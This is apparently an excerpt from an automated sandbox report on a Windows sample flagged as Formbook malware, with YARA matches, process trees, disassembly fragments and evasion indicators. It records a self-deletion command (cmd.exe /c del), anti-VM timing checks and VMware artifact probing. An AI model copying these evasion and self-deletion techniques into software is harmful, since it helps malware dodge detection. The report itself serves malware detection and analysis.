          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@11/6
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile created: C:\Users\user\AppData\Local\Temp\nse5FE8.tmpJump to behavior
          Source: 5t2CmTUhKc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 5t2CmTUhKc.exeVirustotal: Detection: 28%
          Source: 5t2CmTUhKc.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile read: C:\Users\user\Desktop\5t2CmTUhKc.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe' Jump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'Jump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5t2CmTUhKc.exe, 00000000.00000003.333908194.00000000099B0000.00000004.00000001.sdmp, 5t2CmTUhKc.exe, 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5t2CmTUhKc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeUnpacked PE file: 2.2.5t2CmTUhKc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_73612F60 push eax; ret 0_2_73612F8E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041624A pushad ; ret 2_2_0041625B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B47C push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B412 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B41B push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0040B7D2 push ebx; retf 2_2_0040B7D5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B2D0D1 push ecx; ret 2_2_00B2D0E4
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041624A pushad ; ret 2_1_0041625B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B3C5 push eax; ret 2_1_0041B418
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B47C push eax; ret 2_1_0041B482
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B412 push eax; ret 2_1_0041B418
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B41B push eax; ret 2_1_0041B482
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B8D0D1 push ecx; ret 11_2_00B8D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041624A pushad ; ret 11_2_0041625B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B3C5 push eax; ret 11_2_0041B418
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B47C push eax; ret 11_2_0041B482
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B412 push eax; ret 11_2_0041B418
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B41B push eax; ret 11_2_0041B482
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0040B7D2 push ebx; retf 11_2_0040B7D5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile created: C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Windows\SysWOW64\help.exe TID: 6520Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: explorer.exe, 00000005.00000000.363736926.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.363476569.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.363476569.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mict
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.363736926.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]2_2_00B0F0BF
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]2_2_00B0F0BF
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]2_2_00B0F0BF
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B190AF mov eax, dword ptr fs:[00000030h]2_2_00B190AF
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9080 mov eax, dword ptr fs:[00000030h]2_2_00AD9080
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]2_2_00B53884
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]2_2_00B53884
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD58EC mov eax, dword ptr fs:[00000030h]2_2_00AD58EC
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]2_2_00B57016
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]2_2_00B57016
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]2_2_00B57016
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]2_2_00BA4015
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]2_2_00BA4015
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B92073 mov eax, dword ptr fs:[00000030h]2_2_00B92073
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA1074 mov eax, dword ptr fs:[00000030h]2_2_00BA1074
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]2_2_00AF0050
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]2_2_00AF0050
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
